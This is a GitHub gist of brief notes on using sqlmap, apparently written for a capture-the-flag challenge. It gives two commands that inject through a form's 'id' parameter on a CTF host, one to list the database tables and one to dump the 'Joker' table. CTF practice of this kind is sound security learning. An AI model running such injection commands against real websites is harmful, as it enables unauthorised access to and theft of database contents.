Created
February 5, 2017 04:13
-
-
Save xbaby123/a96062a651a326217fe49d0ce4dc4524 to your computer and use it in GitHub Desktop.
how to use sql map
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| -- enum tables | |
| sqlmap -u http://joking.bitsctf.bits-quark.org/index.php --data="id=1&submit1=submit" -p id --dbms=MYSQL --technique=U --tables | |
| -- dump table | |
| sqlmap -u http://joking.bitsctf.bits-quark.org/index.php --data="id=1&submit1=submit" -p id --dbms=MYSQL --technique=U --dump -T Joker |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment